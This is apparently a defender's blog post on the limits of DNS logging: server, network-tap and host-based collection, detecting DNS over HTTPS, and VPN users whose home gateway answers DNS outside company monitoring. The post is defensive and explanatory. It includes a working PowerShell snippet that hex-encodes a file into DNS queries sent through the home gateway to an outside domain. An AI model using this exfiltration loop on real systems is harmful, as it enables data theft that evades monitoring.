How (not) to log DNS traffic

Companies tend to create their security detections based on the trending behavior of threat actors. One of the constantly re-occurring techniques is DNS-based activities like exfiltration via DNS (Domain Name System) or C2 (Command and Control) communication via DNS. Still, a lot of companies are lacking in DNS logging, missing DNS-based detection rules, or not aware of their own blindspots.

In this post I’m not trying to explain how to detect DNS-based techniques. One can find information on this topic internet-wide. But rather, I’m going to point out issues and limits of specific logging methods with which one can face today or in the near future.

featured

Why DNS is used by attackers but not used by defenders

DNS is one of the pillars of today’s internet traffic. It is used by almost every system that is connected to the internet. Thus, it can be seen on every network-connected machine; its presence is not surprising nor suspicious at all. Because it is required by a lot of systems, it is allowed at some level in every network. A workstation can either communicate with an external DNS server or at least it can reach an internal, company-managed DNS server – which is going to forward its request to an external server. This or that, there is no general way to filter this traffic. To find out whether it is malicious or not, you must focus on the target, the content, or the frequency of the DNS traffic. The fact that DNS communication is frequently not blocked, and the detection of its malicious behavior is not easy and needs continuous maintenance makes DNS a useful protocol for an attacker.

Even though it is a critical tool and often used by threat actors, companies still tend to overlook DNS logging. There are typically two big reasons behind this issue. Either the DNS service is provided by a third-party (or it is behind some relay systems) or it is simply a financial decision. In the case of the former one, the problem is that even though the logs can be gathered, and detection can be created, finding the real source of the query is not trivial. Therefore, the logs are not useful and are not collected at all. Detecting something suspicious at a company with 10k+ endpoints but being unable to identify the real source is not helpful. The latter reason is there because collecting DNS logs can be costly, especially if it is not done properly. One DNS query can generate 10+ events (windows dns logging) on a Windows host which can be way too much and expensive. On the other hand, we can configure our logging to only collect the necessary events to make it more efficient and cheap.

Where to gather DNS events from

DNS logs can be collected from multiple places and in multiple ways in a network. All of them has its benefits and none of them is a perfect solution. When you choose which one to use, it is important to know the characteristics of the methods, have a clear overview of your network and tooling and decide what exactly you want to detect in the future.

DNS server

Collecting DNS logs from a centralized DNS server is the first idea in most of the networks. It is centralized, normally easy to forward its logs to a SIEM, and most of the time it is just there. It already exists in the network so it can be a good idea to utilize its logging.

Benefits:
- Centralized, so it is easy to manage and simple to collect logs from it.
- It can have some reputation-based tool implemented in it to categorize DNS queries based on the domain name or IP (and this can be logged as well). Additionally, you can use DNS sinkholing implemented in the DNS server which is going to redirect suspicious requests to a Sinkhole server.
Drawbacks:
- Not all DNS requests will be seen in the logs. DNS Server can only log the requests it gets. The default DNS server is configured on the machine and as we know machines are not reliable. If a machine can change its DNS configuration or can send a request directly to another system without changing the settings (for example because there are no firewall rules in place), then the managed DNS server won’t ever see these queries. Thus, it won’t be able to log them. Also, in this case, the DNS sinkhole solution won’t work.
- Related to the previous bullet point, no DNS traffic is going to be generated if the domain-ip binding is already stored on the machine. If the DNS cache (or hosts file) contains the domain, no request is sent. This way an attacker can add an entry into to cache to redirect user’s traffic without this being noticed or logged by the DNS server.
- The logged data and its format can vary from DNS server to DNS server. Some of them have reputation capabilities while others don’t. Also, some of them store and log the full TXT response while others won’t, due to size constraints. Switching between DNS server tools could require you to adapt your detections. The limited capabilities can especially be an issue for small companies who are using free, non-commercial softwares as DNS server.

From the wire

Moving away from a centralized solution, another way to gather DNS queries is to collect them from the wire. For this, you need some network tap that can listen to the network traffic and can save/forward the necessary data. A lot of companies already have NIDS in place which is frequently able to monitor and log DNS data (it depends on whether you want to detect DNS anomalies by the NIDS or by your SIEM).

Benefits:
- You can collect every data and the full packets if you want to, the way you want to (so you don’t have to deal with the capabilities of the DNS server).
- Less collection-point than in case of host-based logging (next method). It can be easier to manage or find misconfigurations or errors.
- You can collect DNS traffic from the wire which is not sent to the official DNS server. If the traffic goes through the network but the destination is not your DNS server, then the mentioned server won’t be able to log that traffic. However, it is still possible to collect it from the wire (this in itself can be a detection rule to find rogue DNS servers).
- With proper tooling, settings, and rules, you have the possibility to detect secure DNS traffic. For example, DNS over HTTPs can be detected if you have TLS inspection while it is invisible for DNS server-based or host-based logging (in some cases).
Drawbacks:
- There are (usually) more systems to maintain than in case of DNS server-based logging.
- Storing full packets can be too complicated and impossible to justify. (Can be solved by individual log retention period policy if the used SIEM allows this.)
- It can have its own weaknesses and vulnerabilities that could be abused by an attacker to prevent logging.
- In some networks, not all the traffic is going through a network tap. In some cases, traffic inside a subnet is not going through a tap. So rogue DNS server can’t be detected if it is in the same subnet as the workstation. In other cases, there is simply no tap between specific networks. For financial purposes, it can also happen that the traffic between a public site and a machine that connects to the network via VPN through the internet is not monitored by a tap to decrease the load on the VPN connections (so this traffic is not going to the internal network, it directly goes to the external DNS servers).

Host-based collection

Collecting DNS logs from the host can be done multiple ways in itself. You can rely on the OS logs (for example Windows can log DNS queries) or you can use a third-party tool on your system like an EDR solution. They share some of the characteristics, but they have some differences as well so be sure to choose the best one for you.

Benefits:
- Every DNS query that is happening originates from a host so you can collect everything. If the machines use a third-party DNS server and the query is not even going through the network, it still can be collected from the host.
- In some cases, you can even detect DNS over HTTPs. When using DoH, the browser translates the domain to IP by sending the request to the configured DoH server directly and it won’t ask the OS for help. Thus, the OS or an EDR won’t log this traffic. But some of the browsers (for example Firefox) can be configured to log DoH requests as well so you can still have some visibility. A new Windows version also allows you the configure the OS to use DoH instead of normal DNS requests and this traffic can be logged by Windows natively (I haven’t tested this function yet but you can read about it here.)
- Translation of domain names that are in the cache (hosts file) can be logged as well.
Drawbacks:
- A machine can be compromised, they frequently are and in a state like this, we can’t trust the logs or the logging on the machine. If you see some odd DNS request, it can still be a good indicator of infection. On the other hand, the lack of suspicious DNS queries doesn’t mean the machine is clean.
- It can be too noisy, so you have to filter out the unnecessary DNS-related events.

So be alert when you choose the logging method you want to use and be aware of your blindspots in the network. Not seeing something doesn’t mean it is not there.

Typical DNS logging issues

I am pretty sure everybody saw issues in his/her past with DNS logging or detection at a company. Therefore, I do not want to write down a lot of possible cases, but I want to explain two specific ones that I witnessed at a lot of companies and can be an issue today or in the future.

Invisible DNS communication from home

During the recent pandemic, a lot of people started to work from home for good or temporarily. This introduced various new threats for some companies and made other existing threats more severe than they were before. When somebody works remotely, the most popular way to connect the machine securely to the internal network is to use VPN. In a setup like this, the user’s machine will have an IP setting (IP address, default gateway) for its home network and one IP setting for the internal network (internal IP assigned by the internal DHCP, internal default gateway, etc).

It is the job of the VPN client to redirect all of the user’s traffic to the internal network. The VPN configuration defines which traffic should be passed through the VPN tunnel and which can communicate freely. But a machine also should be able to communicate with some systems before it connects to the company’s network so it can build up the connection. This is possibly the reason why the communication with the user’s own default gateway is allowed by the VPN client. (This was the case everywhere I tested it. At least some protocol is allowed.)

So, let me talk a little bit about how the DNS translation works in a setup like this on a Windows host. When your machine connects to your home network, it gets an IP from your DHCP server. It also gets all the other settings which are needed for further communication like a default gateway address, DNS server address, etc. In a simple solution in a normal home network, all these functions are implemented in 1 access point and thus all these IPs are going to point to that system.

When the machine has internet connection, it can build up its VPN tunnel. After this setup, the machine has similar information as the one it got from the home AP - but this one is provided by the company-managed internal systems. So (at least) two DNS servers are going to be assigned to the machine.

When a user tries to translate a domain name to an IP, the machine is going to contact the DNS server. The question is which server is going to be addressed by default: the company one on the other side of the tunnel or the local one in the user’s home network. The important thing here is that the machine is going to create two DNS queries, one for the local server and one for the company server. Both servers are addressed, and both will reply to it. The machine is going to use the response from the fastest one. Obviously, the local one is 1 hop away from the machine (most of the time) so it can answer quicker while the company owned one can be on the other side of the world - so it takes more time for it to reply. But please be aware the default gateway is not necessarily a DNS server, frequently it only forwards the traffic, so whether it is the quicker one or not depends on other things as well.

home network diagram

This can be abused by an attacker who breached the local network of the user or the default gateway of the user to redirect the user’s traffic to a choosen IP. Even traffic towards an internal webpage can be redirected this way. While there is only a small chance that an actor will physically be in the user’s network, we know that a lot of routers provided by ISPs are vulnerable or use default passwords so there is still a non-negligible risk. The big benefit for an attacker here is that he doesn’t have to infiltrate the company-owned and monitored machine; he only has to access the users network/AP.

However, this can still be detected with the proper logging. If the user opens a website using a destination IP that is not the destination IP provided by the company-owned DNS server, we can assume the user got the IP information from another DNS server, possibly a rouge one. However, this detection is FP heavy in case of load-balanced domains that can use multiple IPs.

If you only collect DNS logs from central DNS servers or from the wire, then the previous scenario can be abused by a user or attacker. As I stated previously a DNS request in a home network is sent out to both DNS servers by default. However, DNS resolution can be directed from the command line. The following command can be used in Windows Powershell to send the DNS query only to a specific DNS server.

Resolve-DnsName -Name domainname.com -Server dns_server_ip

As we already established, DNS communication with the default gateway in a home network is not blocked. There are three different DNS servers by location a user can try to query:

Company-owned one: When a user tries to reach an internal DNS system, the traffic is going through the tunnel and reaches the internal (company-owned) DNS server.

External third-party DNS server: In case the target is an external DNS system, the VPN client sends it through the tunnel (depends on the VPN configuration) where a firewall will block this traffic (internal to external DNS communication shouldn’t be allowed from random workstations).

Home DNS server/Default GW: But DNS query targeting the default gateway is not going through the tunnel, it goes directly to the default gateway, thus it won’t be blocked anywhere. So, defining the –Server switch to be the IP address of the default gateway we can exfiltrate data or communicate with a C2 server via DNS without being detected.

Here is a code to steal a random file out of a company-owned machine via DNS using the default gateway. *(This is not a code to be used, I’m just showing how easy it is to exfiltrate some data.) *

Get-Content "path_to_the_file" -Encoding Byte -ReadCount 16
	| ForEach-Object { 
	$output = "" 
	foreach ( $byte in $_ ) { 
		$output += "{0:X2}" -f $byte 
	} 
  	Resolve-DnsName -Name "$output.forensixchange.com” -Server default_gw_ip 
	}

This latter action can only be detected if DNS events are collected from the host.

Detecting DNS over HTTPs

While I already mentioned DoH, I think this protocol is interesting enough to discuss it a little bit further and to point out some of its dangers. When it comes to DoH, the DNS query is embedded into an HTTPs message. This HTTPs request is then sent to a DoH server which can translate the DNS to an IP. Before you could send an HTTPs message to a server you have to translate the DoH Server DNS name to an IP as well. This is either done by sending a plain DNS entry or it can be hardcoded into the app (browser).

Multiple issues need to be addressed by a blue team to successfully handle and detect suspicious DoH traffic:

TLS inspection must be used in the NIDS/network tap/proxy to be able to handle this traffic based on its content. DoH traffic is HTTPs traffic, thus it typically goes through a proxy. Even though proxies can use TLS inspection, I haven’t seen any proxy so far that identified the DoH traffic or marked it in the logs. Because of this, it is hard to process DoH traffic in the proxy logs, but I believe that more and more proxies will recognize and mark this traffic in the future.

Every rule you have for DNS-based attack detection has to be modified to work on HTTP traffic as well. It is possible for a NIDS to automatically parse DNS info from a decrypted HTTPs packet (DoH protocol is well-defined and well-documented) and apply DNS rules on it with a little modification but the NIDS I’m using does not do it yet. So, you have to prepare your NIDS to detect this traffic and to apply the necessary rules.

In case there is no TLS inspection, one can detect DoH traffic based on its periodicity and packet sizes – however, this is not reliable. Even if you successfully detect DoH traffic without TLS inspection, it is hard to say whether it is malicious or not so it will be hard to block only the malignant attempts. It can be used to detect endpoints that use DoH but not really the best solution to block this type of traffic.

A company can decide to block DoH by blocking the DoH providers. This can be done simply by blocking the IP address or URL of DoH providers or by blocking the initial DNS request to translate their domain name. This way one can block every DNS/HTTPs traffic towards well-known providers but there is still a chance that a user can use a not well-known provider and can circumvent the blacklist. And since this traffic looks like normal HTTPs traffic towards an external site, it will be hard to detect or block it.

Real life scenarios

During the last half-year, I had less time than usual so I couldn’t write any blog posts. I was thinking for a long time how to create shorter posts but unfortunately, most of my writing just goes deeper and deeper after I start it. In case of this post, I decided not to go too deep and to be too technical so that I would be able to finish the post in a timely manner. So, while this post is not deeply technical, I’m not going to end it without a good story based on my experiences.

The idea for this post is not a new thing. During the last 2-3 months, I had the chance to test the above-mentioned DNS communication at 5 different companies. At all the companies the users from home could communicate with their default gateway directly by using DNS queries. I assume this is a required setup, so I wasn’t trying to solve this issue, but rather I was trying to find out how many companies have detection for this.

For one company I do not have the proper information to tell whether they can detect this activity or not. From the four remaining companies, only one collects the DNS events from the machines directly. This means three of them don’t even have any visibility from the host to detect exfiltration via the default gateway by a remote user. However, the logging of that last company also wasn’t sufficient. They collected the DNS queries from the host by configuring their EDR but they only defined a dozen tools they wanted to monitor and DNS network communication from other applications wasn’t logged at all (for example some browsers were defined, but PowerShell wasn’t).

Based on this, I recommend you check your logging capabilities and see what you can or can’t detect. It can be especially interesting to find out your users (or attackers on the machine) can push out data via DNS in their home network easily without being detected at all. I also suggest you check your logging and see whether you can detect DoH traffic because it is going to be the default setting soon, even at OS level.